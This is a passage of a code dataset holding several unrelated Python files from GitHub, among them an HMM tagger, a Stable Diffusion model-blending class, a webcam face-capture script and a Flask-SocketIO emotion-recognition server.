subtitle[\"language\"] == lan:\n target_s = subtitle\n if languageDescription == subtitle[\"languageDescription\"]:\n break\n ttDownloadables = target_s[\"ttDownloadables\"]\n simplesdh 
= list(ttDownloadables.values())[0]\n        downloadUrls = simplesdh[\"downloadUrls\"]\n        url = list(downloadUrls.values())[0]\n        return {\n            \"url\": url,\n            \"language\":target_s[\"language\"],\n            \"languageDescription\":target_s[\"languageDescription\"]\n        }\n    def get_title(self):\n        video = self.data[\"video\"]\n        return video[\"title\"]\n\nif __name__ == \"__main__\":\n    with open(\"track_info\",\"r\") as fp:\n        track_info = json.loads(fp.read())\n    with open(\"data\",\"r\") as fp:\n        data = json.loads(fp.read())\n    messager = NetFlixMessageProcessor(data,track_info)\n    video_info = messager.get_videoinfo_by_quality(1080)\n    audio_info = messager.get_audioinfo_by_lan(\"en\")\n    subtitle_info = messager.get_subtitleinfo_by_lan(\"zh-Hans\")\n    title = messager.get_title()\n    print(video_info)\n    print(audio_info)\n    print(subtitle_info)\n    print(title)","repo_name":"2963663242/Folder_online","sub_path":"noteBurner/meidia_convert/netFlixMessageProcessor.py","file_name":"netFlixMessageProcessor.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"71043395248","text":"import sys\nimport time\n\ntags = set()\nobservations = set()\n\ndef loadTrainData(filepath):\n\t#\n\t#\tLoad data from training corpus (POS-Tagged)\n\t#\tThe/DT third/JJ was/VBD being/VBG run/VBN by/IN the/DT head/NN of/IN an/DT investment/NN firm/NN ./.\n\t#\n\t#print(\"Loading training corpus...(\"+str(filepath)+\")\\n\")\n\twith open(filepath) as trainFile:\n\t\tdata = trainFile.read()\n\treturn data\n\ndef prepareData(data):\n\t#\n\t#\tPrepare corpus for training\n\t#\tSplit data into sentences\n\t#\n\tsentences = data.strip().split('\\n')\n\t#sentences = ['$STRT#/q0 ' + str(s) + ' $END#/qF' for s in sentences ]\n\tsentences = ['$STRT#/q0 ' + str(s) + ' $END#/qF' for s in sentences ]\n\treturn sentences\n\ndef learnTransitions(sentences):\n\t#\n\t#\tLearn A, the transition matrix, from the corpus\n\t#\t\n\t#\n\n\t#Initialize dicts for total tag occurrence count and tag1-to-tag2 transitions\n\ttagCount = {}\n\ttagTransitionDict = {}\n\tglobal tags\n\t#Tokenize in words\n\tfor s in sentences:\n\t\t#print(s)\n\t\t#input('...')\n\t\twordTagPairs = s.split(' ')\n\t\twTP_count = len(wordTagPairs)\n\t\tfor k in range((wTP_count-1)):\n\t\t\t#print('\\t'+ wordTagPairs[k] + ' ' + str(k))\n\t\t\tcurr_wT = wordTagPairs[k]\n\t\t\tcurrTag = curr_wT.rsplit('/',1)[1]\n\t\t\t\n\t\t\tnext_wT = wordTagPairs[k+1]\n\t\t\tnextTag = next_wT.rsplit('/',1)[1]\n\n\t\t\ttags.add(str(currTag))\n\t\t\ttags.add(str(nextTag))\t\n\t\t\ttagCount[currTag] = tagCount.get(currTag,0) + 1\n\t\t\ttagTransitionDict[(currTag, nextTag)] = tagTransitionDict.get((currTag,nextTag),0) + 1\n\n\t#IF-DEBUG\n\t#for x in tagCount.keys():\n\t\t#print(str(x)+'\\n')\n\t#for x in tagTransitionDict.keys():\n\t#\tprint(str(x)+'='+str(tagTransitionDict.get(x))+'\\n')\n\t#print(\"Total Tags: \" + str(len(tagCount.keys())))\n\treturn tagCount,tagTransitionDict\n\ndef learnEmissions(sentences):\n\t#\n\t#\tLearn B, the emission matrix, from the corpus\n\t#\t\n\t#\n\n\t#Initialize dicts for total tag occurrence count and tag-to-word emissions\n\ttagWordEmitDict = {}\n\ttagCount = {}\n\tglobal observations\n\t#Tokenize in words\n\tfor s in sentences:\n\t\t#print(s)\n\t\t#input('...')\n\t\twordTagPairs = s.split(' ')\n\t\twTP_count = len(wordTagPairs)\n\t\tfor k in range(1,wTP_count):\n\t\t\t#print('\\t'+ wordTagPairs[k] + ' ' + str(k))\n\t\t\tcurr_wT = wordTagPairs[k]\n\t\t\tcurrWord = curr_wT.rsplit('/',1)[0]\n\t\t\tcurrTag = 
curr_wT.rsplit('/',1)[1]\n\n\t\t\tobservations.add(str(currWord))\n\t\t\ttagCount[currTag] = tagCount.get(currTag,0) + 1\n\t\t\ttagWordEmitDict[(currTag, currWord)] = tagWordEmitDict.get((currTag, currWord),0) + 1\n\n\t#IF-DEBUG\n\t#for x in tagWordEmitDict.keys():\n\t\t#print(str(x)+'='+str(tagWordEmitDict.get(x))+'/'+str(tagCount.get(x[0]))+'\\n')\n\treturn tagCount,tagWordEmitDict\n\ndef saveModelParams(tagCountA,transitionDict,tagCountB, tagWordEmitDict):\n\tts = time.gmtime()\n\tmodel = ''\n\tmodel += 'HMM Model File - '+str(time.strftime(\"%Y-%m-%d %H:%M:%S\", ts))\n\tmodel += '\\n---Tags---\\n'\n\tmodel += str(len(tags)) + '\\n'\n\tfor t in tags:\n\t\tmodel += t+'\\n'\t\t\n\tmodel = model.strip('\\n')\n\tmodel += '\\n---Observations---\\n'\n\tmodel += str(len(observations)) + '\\n'\n\tfor o in observations:\n\t\tmodel += o +'\\n'\n\tmodel = model.strip('\\n')\n\tmodel += '\\n---Transition Probablities---\\n'\n\ttransProbs = ''\n\ttransProbsCount = 0\n\tfor t in tags:\n\t\tdenominator = tagCountA['q0']\n\t\tif denominator == 0:\n\t\t\tdenominator = 1\n\t\tnumerator = transitionDict.get(('q0',t),0)\n\t\tif numerator > 0:\t\n\t\t\ttransProbs += 'q0 ' + str(t) + ' ' + str(float(numerator/denominator)) + '\\n'\n\t\t\t#transProbs += 'q0 ' + str(t) + ' ' + str(float(numerator)) + ' ' + str(denominator) + '\\n'\n\t\t\ttransProbsCount += 1\n\tfor t1 in tags:\n\t\tif not str(t1) == 'q0':\n\t\t\tfor t2 in tags:\n\t\t\t\tdenominator = tagCountA.get(t1,0)\n\t\t\t\tif denominator == 0:\n\t\t\t\t\tdenominator = 1\n\t\t\t\tnumerator = transitionDict.get((t1,t2),0)\n\t\t\t\tif numerator > 0:\t\n\t\t\t\t\ttransProbs += str(t1) + ' ' + str(t2) + ' ' + str(float(numerator/denominator)) + '\\n'\n\t\t\t\t\t#transProbs += str(t1) + ' ' + str(t2) + ' ' + str(float(numerator)) + ' ' + str(denominator) + '\\n'\t\n\t\t\t\t\ttransProbsCount += 1\n\tmodel += str(transProbsCount) + '\\n'\n\tmodel += transProbs\n\tmodel = model.strip('\\n')\n\tmodel += '\\n--Emission Probablities---\\n'\n\temissProbs = ''\n\temissProbsCount = 0\n\tfor t in tags:\n\t\tfor o in observations:\n\t\t\tdenominator = tagCountB.get(t,0)\n\t\t\tif denominator == 0:\n\t\t\t\tdenominator = 1\n\t\t\tnumerator = tagWordEmitDict.get((t,o),0)\n\t\t\tif numerator > 0:\t\n\t\t\t\temissProbs += str(t) + ' ' + str(o) + ' ' + str(float(tagWordEmitDict.get((t,o),0)/denominator)) + '\\n'\n\t\t\t\t#emissProbs += str(t) + ' ' + str(o) + ' ' + str(float(tagWordEmitDict.get((t,o),0))) + ' ' + str(denominator) + '\\n'\n\t\t\t\temissProbsCount += 1\n\tmodel += str(emissProbsCount) + '\\n'\n\tmodel += emissProbs\n\tmodel = model.strip('\\n')\n\twith open(\"hmmmodel.txt\", \"w+\") as f:\n\t\tf.write(model)\n\ndef main():\n\ttrainFilePath = sys.argv[1]\n\tcorpus = loadTrainData(trainFilePath)\n\tsentences = prepareData(corpus)\t\n\ttagCountA,tagTransitionDict = learnTransitions(sentences)\n\ttagCountB,tagWordEmitDict = learnEmissions(sentences)\n\t#Check if both are same.\n\t#for x in tagCountA.keys():\n\t\t#print(str(x) +'-'+ str(tagCountA.get(x,0))+'-'+str(tagCountB.get(x,0)))\n\t#print(tagCountA.keys())\n\tsaveModelParams(tagCountA,tagTransitionDict,tagCountB,tagWordEmitDict)\n\t\nif __name__ == '__main__':\n main()","repo_name":"arshd91/Hmm-ViterbiDecode","sub_path":"hmmlearn3.py","file_name":"hmmlearn3.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"72266964846","text":"import re\nwith open(\"./Day 7/d7_input.txt\") as f:\n inputs = 
f.readlines()\n\n\ndef part1():\n    root = Tree(\"/\")\n    total_size = 0\n\n    for i, input in enumerate(inputs):\n        input = input.strip()\n\n        if input[:7] == \"$ cd ..\":\n            handle_move_out()\n        elif input[:4] == \"$ cd\":\n            name = input.split(\"$ cd \")[1]\n            handle_move_in(name, root, i)\n        elif input[:4] == \"$ ls\":\n            handle_list()\n\n    return print(total_size)\n\n\ndef handle_move_in(name, root, i):\n    size = get_size(i)\n    root.add_child(Tree(name, size))\n    return\n\n\ndef handle_move_out():\n    return\n\n\ndef handle_list():\n    return\n\ndef get_size(i):\n    i += 1\n    size = 0\n\n    while i < len(inputs) and inputs[i][:4] != \"$ cd\":\n        if inputs[i][0].isnumeric():\n            size += int(re.findall('\\d+', inputs[i])[0])\n        i += 1\n    return size\n\n\nclass Tree(object):\n    def __init__(self, name='root', size=0, children=None):\n        self.name = name\n        self.size = size\n        self.children = []\n        if children is not None:\n            for child in children:\n                self.add_child(child)\n\n    def __repr__(self):\n        return self.name\n\n    def add_child(self, node):\n        assert isinstance(node, Tree)\n        self.children.append(node)\n\n\npart1()\n","repo_name":"j206/advent-of-code-2022","sub_path":"Day 07/d7_part1_recursive.py","file_name":"d7_part1_recursive.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36852128908","text":"import cv2\r\n\r\n\r\n\r\nface_detector=cv2.CascadeClassifier(cv2.data.haarcascades+'haarcascade_frontalface_default.xml')\r\n\r\n\r\ncap=cv2.VideoCapture(0)\r\ncount=0\r\n\r\n\r\n\r\ndef face_extract(frame):\r\n    gray_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n    face_lens = face_detector.detectMultiScale(gray_img, scaleFactor=1.3, minNeighbors=5)\r\n\r\n    if len(face_lens)==0:\r\n        return None\r\n\r\n    for (x, y, w, h) in face_lens:\r\n        x,y = (x - 10, y - 10)\r\n        face = frame[y:y + h + 50, x:x + w + 50]\r\n\r\n    return face\r\n\r\n\r\nwhile True:\r\n    res, frame = cap.read()\r\n    if face_extract(frame) is None:\r\n        print('face not found')\r\n        pass\r\n    else:\r\n        count=count+1\r\n        face=cv2.resize(face_extract(frame),(400,400))\r\n\r\n        file_path='./Images/test/'+str(count)+'.jpg'\r\n        cv2.imwrite(file_path,face)\r\n\r\n        cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n        cv2.imshow('face',face)\r\n\r\n    if cv2.waitKey(1)==13 or count==100:\r\n        break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nprint(\"Done\")\r\n","repo_name":"RaguTeja/MaskDetection_AlertSystem","sub_path":"MASK_DETECTION/Capture_RealTime_Faces.py","file_name":"Capture_RealTime_Faces.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
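# Aside on the record above: cv2.CascadeClassifier does not raise when the XML
# path is wrong, it just returns an empty classifier, so a load check is cheap
# insurance. A minimal sketch using the same bundled cascade:
import cv2
detector = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
assert not detector.empty(), 'cascade failed to load'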
+{"seq_id":"11228603670","text":"\nclass FullName:\n\n    def __init__(self,name='mehedi',age = 30):\n        self.name = name\n        self.age = age\n\n    def compare(self,other_object):\n\n        if self.age == other_object.age:\n            return True\n        else:\n            return False\n\nobj1 = FullName() #creating obj1 automatically calls __init__, which receives obj1 through the self parameter\nobj2 = FullName() # same as obj1\n\nobj1.age = 20\nobj2.age = 20\n\nif obj1.compare(obj2): #obj1 is bound to compare's self parameter and obj2 is passed in as the other_object parameter\n    print('ages are same')\nelse:\n    print('ages are not same')\n\n\n\n","repo_name":"Mehedi-Bin-Hafiz/Python-OOP","sub_path":"classes/constructor_and_self.py","file_name":"constructor_and_self.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15501211454","text":"from diffusers import UniPCMultistepScheduler, DDIMScheduler\r\nimport diffusers\r\nfrom diffusers import StableDiffusionControlNetPipeline, ControlNetModel\r\nfrom transformers import CLIPTextModel, CLIPTokenizer\r\nimport random\r\nimport torch\r\nimport os\r\nfrom diffusers import StableDiffusionPipeline, DPMSolverMultistepScheduler, DDIMScheduler, AutoencoderKL, UNet2DConditionModel\r\nfrom transformers import CLIPTextModel\r\nimport json\r\nimport piexif\r\nimport copy\r\ntorch.backends.cuda.matmul.allow_tf32 = True\r\n\r\n# {\r\n#     'vae': '.ARTMAN_HUGE_144000',\r\n#     'textEncoder':'.ARTMAN_HUGE_144000',\r\n#     'models':[{'name':'.ARTMAN_HUGE_144000','factor':0.5},]\r\n# }\r\n\r\n\r\nclass DiffusionCreator:\r\n    def __init__(self, modelWeightRoot='.',\r\n                 modelCfgDict=[\r\n                     {'name': 'runwayml/stable-diffusion-v1-5', 'factor': 1}],\r\n                 defaultDType=torch.float16,\r\n                 useXformers=False,\r\n                 loadMode='blend') -> None:\r\n        self.modelWeightRoot = modelWeightRoot\r\n        self.modelCfgDict = modelCfgDict\r\n        self.defaultDType = defaultDType\r\n        self.useXformers = useXformers\r\n        self.randGenerator = torch.Generator()\r\n        self.blendMetaInfoDict = {}\r\n        self.loadModel()\r\n\r\n    def parseModelPath(self, modelPath, modelWeightRoot):\r\n        if modelPath[0] == '.':\r\n            modelPath = os.path.join(\r\n                modelWeightRoot, modelPath[1:])\r\n        return modelPath\r\n\r\n    def loadModel(self):\r\n        self.loadMultiModel(self.modelCfgDict['models'])\r\n        baseModelName = self.modelCfgDict['models'][0]['name']\r\n        tempUNet = copy.deepcopy(self.modelUNetList[baseModelName])\r\n        if len(self.modelCfgDict['models']) > 1:\r\n            unetWeight = self.blendModel(self.modelCfgDict['models'])\r\n            tempUNet.load_state_dict(unetWeight)\r\n\r\n        baseModelName = self.parseModelPath(\r\n            baseModelName, self.modelWeightRoot)\r\n\r\n        pipeArgDict = {}\r\n\r\n        from lpw_stable_diffusion import StableDiffusionLongPromptWeightingPipeline\r\n        from lpw_stable_diffusion_multi import StableDiffusionLongPromptWeightingMultiUNetPipeline\r\n\r\n        if 'vae' in self.modelCfgDict.keys():\r\n            vaePath = self.parseModelPath(\r\n                self.modelCfgDict['vae'], self.modelWeightRoot)\r\n            pipeArgDict['vae'] = AutoencoderKL.from_pretrained(\r\n                vaePath, subfolder='vae', cache_dir=self.modelWeightRoot, torch_dtype=self.defaultDType)\r\n\r\n        if 'textEncoder' in self.modelCfgDict.keys():\r\n            textEncoderPath = self.parseModelPath(\r\n                self.modelCfgDict['textEncoder'], self.modelWeightRoot)\r\n            pipeArgDict['text_encoder'] = CLIPTextModel.from_pretrained(\r\n                textEncoderPath, subfolder='text_encoder', cache_dir=self.modelWeightRoot, torch_dtype=self.defaultDType)\r\n            pipeArgDict['tokenizer'] = CLIPTokenizer.from_pretrained(\r\n                textEncoderPath, subfolder='tokenizer', cache_dir=self.modelWeightRoot)\r\n\r\n        if 'multiUNet' in self.modelCfgDict.keys():\r\n            self.pipe = StableDiffusionLongPromptWeightingMultiUNetPipeline.from_pretrained(\r\n                baseModelName, cache_dir=self.modelWeightRoot,\r\n                
unet=self.modelUNetList[self.modelCfgDict['models'][0]['name']],\r\n feature_extractor=None,\r\n safety_checker=None,\r\n torch_dtype=self.defaultDType,\r\n **pipeArgDict\r\n )\r\n print('%s -> %s'%(self.modelCfgDict['models'][0]['name'],\r\n self.modelUNetList[self.modelCfgDict['models'][0]['name']].device))\r\n modelCnt=1\r\n for model in self.modelCfgDict['models'][1:]:\r\n self.modelUNetList[model['name']].enable_xformers_memory_efficient_attention()\r\n self.modelUNetList[model['name']].to('cuda:%d'%(modelCnt//2))\r\n print('%s -> %s'%(model['name'],self.modelUNetList[model['name']].device)) \r\n modelCnt = modelCnt+1\r\n self.pipe.appendExtraUNet(self.modelUNetList[model['name']])\r\n else:\r\n self.pipe = StableDiffusionLongPromptWeightingPipeline.from_pretrained(\r\n baseModelName, cache_dir=self.modelWeightRoot,\r\n unet=tempUNet,\r\n feature_extractor=None,\r\n safety_checker=None,\r\n torch_dtype=self.defaultDType,\r\n **pipeArgDict\r\n )\r\n\r\n if 'scheduler' in self.modelCfgDict.keys():\r\n if self.modelCfgDict['scheduler'] == 'DDIMScheduler':\r\n self.pipe.scheduler = DDIMScheduler(\r\n **{\r\n \"beta_end\": 0.012,\r\n \"beta_schedule\": \"scaled_linear\",\r\n \"beta_start\": 0.00085,\r\n \"clip_sample\": False,\r\n \"num_train_timesteps\": 1000,\r\n \"prediction_type\": \"epsilon\",\r\n \"set_alpha_to_one\": False,\r\n \"steps_offset\": 1,\r\n }\r\n )\r\n else:\r\n scheduer = getattr(diffusers, self.modelCfgDict['scheduler'])\r\n self.pipe.scheduler = scheduer.from_config(\r\n self.pipe.scheduler.config)\r\n\r\n if self.useXformers:\r\n self.pipe.enable_xformers_memory_efficient_attention()\r\n\r\n def loadMultiModel(self, blendParamDictList):\r\n self.modelUNetList = {}\r\n for blendParamDict in blendParamDictList:\r\n modelNameRaw = blendParamDict['name']\r\n if modelNameRaw[0] == '.':\r\n modelName = os.path.join(\r\n self.modelWeightRoot, modelNameRaw[1:], 'unet')\r\n else:\r\n modelName = modelNameRaw\r\n\r\n unet = UNet2DConditionModel.from_pretrained(\r\n modelName,\r\n subfolder='unet',\r\n cache_dir=self.modelWeightRoot,\r\n torch_dtype=self.defaultDType)\r\n\r\n self.modelUNetList[modelNameRaw] = unet\r\n\r\n def blendModel(self, blendParamDictList, blendMode='weightMix'):\r\n firstModelParamDict = blendParamDictList[0]\r\n firstModelName = firstModelParamDict['name']\r\n firstModelFactor = firstModelParamDict['factor']\r\n firstModelWeightKeys = self.modelUNetList[firstModelName].state_dict(\r\n ).keys()\r\n\r\n tempStateDict = {}\r\n blendMetaInfoDict = {\r\n 'mode': blendMode,\r\n 'param': None\r\n }\r\n\r\n if blendMode == 'randLayer':\r\n tempStateChoosenDict = {}\r\n for weightKey in firstModelWeightKeys:\r\n randomIndex = random.randint(0, len(blendParamDictList)-1)\r\n choosenModelParamDict = blendParamDictList[randomIndex]\r\n choosenModelName = choosenModelParamDict['name']\r\n tempStateDict[weightKey] = self.modelUNetList[choosenModelName].state_dict()[\r\n weightKey]\r\n tempStateChoosenDict[weightKey] = randomIndex\r\n blendMetaInfoDict['param'] = tempStateChoosenDict\r\n elif blendMode == 'weightMix':\r\n modelIdx = 0\r\n factorDict = {modelIdx: firstModelFactor}\r\n for weightKey, weightTensor in self.modelUNetList[firstModelName].state_dict().items():\r\n tempStateDict[weightKey] = weightTensor*firstModelFactor\r\n\r\n for modelParamDict in blendParamDictList[1:]:\r\n modelName = modelParamDict['name']\r\n modelFactor = modelParamDict['factor']\r\n modelIdx += 1\r\n factorDict[modelIdx] = modelFactor\r\n for weightKey, weightTensor in 
tempStateDict.items():\r\n tempStateDict[weightKey] += self.modelUNetList[modelName].state_dict()[\r\n weightKey]*modelFactor\r\n\r\n blendMetaInfoDict['param'] = factorDict\r\n\r\n self.blendMetaInfoDict = blendMetaInfoDict\r\n\r\n return tempStateDict\r\n\r\n def blendInRuntime(self, blendParamDictList, blendMode='weightMix'):\r\n self.pipe.unet.load_state_dict(\r\n self.blendModel(blendParamDictList, blendMode))\r\n\r\n def getExif(self, jsonDict):\r\n # https://stackoverflow.com/questions/52729428/how-to-write-custom-metadata-into-jpeg-with-python/63400376#63400376\r\n data = json.dumps(jsonDict).encode(encoding='utf8')\r\n exif_ifd = {piexif.ExifIFD.MakerNote: data}\r\n\r\n exif_dict = {\"0th\": {}, \"Exif\": exif_ifd, \"1st\": {},\r\n \"thumbnail\": None, \"GPS\": {}}\r\n exif_dat = piexif.dump(exif_dict)\r\n return exif_dat\r\n\r\n def generate(self, prompt,\r\n outputDir='./imgs',\r\n seed=None, usePromptAsSubDir=False,\r\n returnPILImage=False,\r\n extraArgDict={}):\r\n if seed is None:\r\n seed = self.randGenerator.seed()\r\n self.randGenerator.manual_seed(seed)\r\n else:\r\n self.randGenerator.manual_seed(seed)\r\n\r\n if 'prompt' in extraArgDict.keys():\r\n prompt = extraArgDict['prompt']\r\n genMetaInfoDict = {\r\n 'seed': seed,\r\n 'prompt': prompt,\r\n 'model': self.modelCfgDict,\r\n 'blendMetaInfo': self.blendMetaInfoDict\r\n }\r\n\r\n argDict = {\r\n 'prompt': prompt,\r\n 'height': 512,\r\n 'width': 512,\r\n 'num_inference_steps': 50,\r\n 'guidance_scale': 7.5,\r\n 'max_embeddings_multiples': 3,\r\n }\r\n\r\n argDict.update(extraArgDict)\r\n genMetaInfoDict.update(argDict)\r\n\r\n if not returnPILImage:\r\n if usePromptAsSubDir:\r\n if 'originalPrompt' in argDict.keys():\r\n prompt = argDict['originalPrompt']\r\n else:\r\n prompt = argDict['prompt']\r\n outputDir = os.path.join(\r\n outputDir, os.path.normpath(prompt))\r\n\r\n if not os.path.exists(outputDir):\r\n os.makedirs(outputDir)\r\n\r\n if 'originalPrompt' in argDict.keys():\r\n del argDict['originalPrompt']\r\n\r\n image = self.pipe(generator=self.randGenerator,\r\n **argDict\r\n ).images[0]\r\n\r\n exifGenMetaInfoDict = genMetaInfoDict\r\n if 'image' in exifGenMetaInfoDict.keys():\r\n del exifGenMetaInfoDict['image']\r\n\r\n if returnPILImage:\r\n return image\r\n else:\r\n exif_dat = self.getExif(exifGenMetaInfoDict)\r\n image.save(os.path.join(outputDir, '%d.jpg' %\r\n seed), quality=90, exif=exif_dat)\r\n\r\n def to(self, device):\r\n self.pipe.to(device)\r\n self.randGenerator = torch.Generator(device=device)\r\n\r\n\r\n# example\r\n# from Creator import DiffusionCreator,RandomArtistGenerator,RandomImageSizeGenerator,PromptGenerator\r\n# import torch\r\n\r\n# if __name__ == \"__main__\":\r\n# modelCfgDict = ({'name': 'runwayml/stable-diffusion-v1-5', 'factor': 0.4},\r\n# {'name': 'Linaqruf/anything-v3.0', 'factor': 0.6})\r\n# creator = DiffusionCreator(modelWeightRoot=r'../StableDiffusionWeight',\r\n# modelCfgDict=modelCfgDict, # To use local weight you should start with \".\"\r\n# defaultDType=torch.float16,\r\n# useXformers=True)\r\n\r\n# creator.to('cuda')\r\n# artistGen = RandomArtistGenerator()\r\n# sizeGen = RandomImageSizeGenerator(sizeSet='big')\r\n# promptGen = PromptGenerator(\r\n# [\r\n# 'illustration of beautiful huge dahlia garden'\r\n# ],\r\n# negativePrompt=None,#'closed eyes,slanted eyes,ugly,Polydactyly,handicapped,extra fingers,fused fingers,poorly drawn hands,extra legs,one leg,woman underwear,low quality,low res,blurry,draft,text,watermark,signature,two heads,mutated 
hands,mutation,deformed, bad anatomy, bad proportions,too many fingers,morbid, mutilated, extra limbs,disfigured,missing arms,missing legs,extra arms,malformed limbs',\r\n#             artistGenerator=RandomArtistGenerator()\r\n#         )\r\n\r\n#     while True:\r\n#         randomSize = sizeGen.getSize()\r\n#         randomArtist = artistGen.getArtist()\r\n\r\n#         genArgDict = {\r\n#             'height': randomSize[0],\r\n#             'width': randomSize[1],\r\n#             'num_inference_steps': 60,\r\n#             'guidance_scale': 7.5\r\n#         }\r\n#         genArgDict.update(promptGen.getPrompt())\r\n#         creator.generate(\r\n#             '', extraArgDict=genArgDict)\r\n","repo_name":"eeyrw/DiffusionCreatorToolkit","sub_path":"Creator.py","file_name":"Creator.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"38223512426","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n\n   @ Author : Max_Pengjb\n   @ date : 2018/9/23 22:37\n   @ IDE : PyCharm\n   @ GitHub : https://github.com/JackyPJB\n   @ Contact : pengjianbiao@hotmail.com\n-------------------------------------------------\n    Description : \n-------------------------------------------------\n\"\"\"\n\n__author__ = 'Max_Pengjb'\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\ndef lrd(root):\n    # iterative postorder traversal (left, right, root); 'pre' remembers the\n    # last emitted node so each right subtree is descended only once\n    ls = []\n    ans = []\n    pre = None\n    while root or len(ls) > 0:\n        if root:\n            ls.append(root)\n            root = root.left\n        else:\n            root = ls[-1]\n            if root.right and root.right != pre:\n                root = root.right\n            else:\n                ls.pop()\n                ans.append(root.val)\n                pre = root\n                root = None\n    return ans\n\n\n","repo_name":"Max-PJB/python-learning","sub_path":"stack_queue/lrd_Postorder_Traversal.py","file_name":"lrd_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"36944516779","text":"from flask import Flask, render_template, Response, redirect, url_for, jsonify\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nimport uuid\nfrom keras.preprocessing.image import img_to_array\nimport imutils\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport json\nimport base64\nfrom io import StringIO\nfrom flask_uuid import FlaskUUID\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\nFeelingList = []\n\n\n@socketio.on(\"my event\")\ndef handle_my_custom_event(data):\n    data = json.dumps(data)\n    data = json.loads(data)\n    # print(data)\n    strB64 = data[\"data\"]\n\n    # print(\"strB64\", strB64)\n    # test camera video\n    fh = open(\"test-data.mp4\", \"wb\")\n    fh.write(base64.b64decode(strB64))\n    fh.close()\n\n    #************Model**********************#\n    # parameters for loading data and images\n    detection_model_path = 'haarcascade/haarcascade_frontalface_default.xml'\n\n    # pre-trained model\n    emotion_model_path = 'pretrained_models/cnn.hdf5'\n    # hyper-parameters for bounding boxes shape\n    # loading models\n    face_detection = cv2.CascadeClassifier(detection_model_path)\n    emotion_classifier = load_model(emotion_model_path, compile=False)\n    EMOTIONS = [\"angry\", \"disgust\", \"scared\", \"happy\", \"sad\", \"surprised\",\n                \"neutral\"]\n    try:\n        camera = cv2.VideoCapture('test-data.mp4')\n    except:\n        print(\"cannot read the video!\")\n    if (camera.isOpened() == False):\n        
print(\"Error opening video stream or file\")\n\n while (camera.isOpened()):\n ret, frame = camera.read()\n # reading the frame\n if ret == True:\n frame = imutils.resize(frame, width=800)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detection.detectMultiScale(\n gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n # canvas = np.zeros((250, 300, 3), dtype=\"uint8\")\n frameClone = frame.copy()\n if len(faces) > 0:\n faces = sorted(faces, reverse=True,\n key=lambda x: (x[2] - x[0]) * (x[3] - x[1]))[0]\n (X, Y, W, H) = faces\n\n # Extract the facial key point of the face from the grayscale image, resize it to a fixed 64x64 pixels(pre-trained model shape)\n # the facial for classification via the CNN\n facial = gray[Y:Y + H, X:X + W]\n facial = cv2.resize(facial, (64, 64))\n facial = facial.astype(\"float\") / 255.0\n facial = img_to_array(facial)\n facial = np.expand_dims(facial, axis=0)\n\n # ti le cua cam xuc\n preds = emotion_classifier.predict(facial)[0]\n # lay ra ti le cam xuc lon nhat\n emotion_probability = np.max(preds)\n # lay ra ten cua cam xuc lon nhat\n label = EMOTIONS[preds.argmax()]\n\n #socketio.emit(\"list-emotion\", {\"msg\": request.sid })\n\n id = data[\"id\"]\n global FeelingList\n\n # Kiem tra ton tai id nay trong Feeling list chua\n isIncluded = False\n for fl in FeelingList:\n # Kiem tra bang id\n if fl[\"id\"] == id:\n isIncluded = True\n # Co roi thi tang gia tri da nhan dien duoc\n fl[label] += 1\n break\n\n # Chua co thi add vao\n if(isIncluded == False):\n Feeling_add = {\"id\": id, \"angry\": 0, \"disgust\": 0, \"scared\": 0, \"happy\": 0,\n \"sad\": 0, \"surprised\": 0, \"neutral\": 0}\n Feeling_add[label] += 1\n\n FeelingList.append(Feeling_add)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\n#****************************************#\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"
Connected to Face detect server is ok
\"\n\n\n@app.route('/get-list-emotion', methods=['GET'])\ndef api_all():\n return jsonify(FeelingList)\n\n\n@app.route('/reset-data', methods=['GET'])\ndef reset_data():\n global FeelingList\n FeelingList = []\n return jsonify(\"ok\")\n\n\nif __name__ == '__main__':\n socketio.run(app, host=\"127.0.0.1\", port=8080, debug=True)\n","repo_name":"nguyendinhhan98/FaceEmotionRecognitionUsingDeepLearningAndWebRTC","sub_path":"ServerAI/detect_emotion.py","file_name":"detect_emotion.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24037358958","text":"from __future__ import absolute_import\n\nimport apt\n\nfrom .base_backend import PackageManagerBase\nfrom .apt_package import AptPackage\nfrom .apt_upgrade import AptUpgrade\n\nclass AptPackageManager( PackageManagerBase ):\n def __init__(self):\n super(AptPackageManager, self).__init__()\n self.name = \"apt\"\n self.upgrades = []\n \n def getUpgrades( self ):\n cache = 